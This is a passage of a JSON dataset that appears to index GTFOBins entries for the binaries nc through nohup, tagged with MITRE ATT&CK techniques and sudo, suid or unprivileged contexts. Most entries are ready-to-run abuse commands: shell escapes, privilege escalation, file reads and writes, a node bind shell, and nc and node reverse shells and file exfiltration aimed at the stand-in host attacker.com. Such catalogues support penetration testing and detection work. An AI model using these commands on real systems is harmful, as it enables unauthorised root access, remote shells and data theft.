/bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:1:sudo","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:1:suid","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:1:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:ncdu:shell:0:sudo","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ncdu/"]},{"id":"gtfo:ncdu:shell:0:suid","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ncdu/"]},{"id":"gtfo:ncdu:shell:0:unprivileged","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ncdu/"]},{"id":"gtfo:ncftp:shell:0:sudo","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ncftp/"]},{"id":"gtfo:ncftp:shell:0:suid","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ncftp/"]},{"id":"gtfo:ncftp:shell:0:unprivileged","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ncftp/"]},{"id":"gtfo:needrestart:inherit:0:sudo","toolId":"gtfo:needrestart","toolName":"needrestart","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"echo '...' >/path/to/temp-file\nneedrestart -c /path/to/temp-file","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/needrestart/"]},{"id":"gtfo:needrestart:inherit:0:unprivileged","toolId":"gtfo:needrestart","toolName":"needrestart","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"echo '...' >/path/to/temp-file\nneedrestart -c /path/to/temp-file","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/needrestart/"]},{"id":"gtfo:neofetch:file-read:0:sudo","toolId":"gtfo:neofetch","toolName":"neofetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"neofetch --ascii /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/neofetch/"]},{"id":"gtfo:neofetch:file-read:0:unprivileged","toolId":"gtfo:neofetch","toolName":"neofetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"neofetch --ascii /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/neofetch/"]},{"id":"gtfo:neofetch:shell:0:sudo","toolId":"gtfo:neofetch","toolName":"neofetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh' >/path/to/temp-file\nneofetch --config /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/neofetch/"]},{"id":"gtfo:neofetch:shell:0:unprivileged","toolId":"gtfo:neofetch","toolName":"neofetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh' >/path/to/temp-file\nneofetch --config /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/neofetch/"]},{"id":"gtfo:nft:file-read:0:sudo","toolId":"gtfo:nft","toolName":"nft","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nft -f /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nft/"]},{"id":"gtfo:nft:file-read:0:unprivileged","toolId":"gtfo:nft","toolName":"nft","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nft -f /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nft/"]},{"id":"gtfo:nginx:download:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"cat >/path/to/temp-file <<EOF\nuser root;\nhttp {\n server {\n listen 80;\n root /;\n autoindex on;\n dav_methods PUT;\n }\n}\nevents {}\nEOF\n\nnginx -c /path/to/temp-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nginx:library-load:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nginx:library-load:0:suid","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nginx:library-load:0:unprivileged","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nginx:upload:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cat >/path/to/temp-file <<EOF\nuser root;\nhttp {\n server {\n listen 80;\n root /;\n autoindex on;\n dav_methods PUT;\n }\n}\nevents {}\nEOF\n\nnginx -c /path/to/temp-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nice:shell:0:sudo","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nice /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nice/"]},{"id":"gtfo:nice:shell:0:suid","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nice /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nice/"]},{"id":"gtfo:nice:shell:0:unprivileged","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nice /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nice/"]},{"id":"gtfo:nl:file-read:0:sudo","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nl/"]},{"id":"gtfo:nl:file-read:0:suid","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nl/"]},{"id":"gtfo:nl:file-read:0:unprivileged","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nl/"]},{"id":"gtfo:nm:file-read:0:sudo","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nm/"]},{"id":"gtfo:nm:file-read:0:suid","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nm/"]},{"id":"gtfo:nm:file-read:0:unprivileged","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nm/"]},{"id":"gtfo:nmap:file-read:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-read:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-read:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-write:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-write:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-write:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:inherit:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:inherit:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:inherit:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:shell:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:shell:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:shell:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:node:bind-shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:bind-shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"]);\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:bind-shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:download:0:sudo","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:download:0:suid","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:download:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-read:0:sudo","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-read:0:suid","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-read:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-write:0:sudo","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-write:0:suid","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-write:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:reverse-shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:reverse-shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"]);\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:reverse-shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:shell:0:capabilities","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'process.setuid(0); require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:upload:0:sudo","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:upload:0:suid","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:upload:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:nohup:command:0:sudo","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the 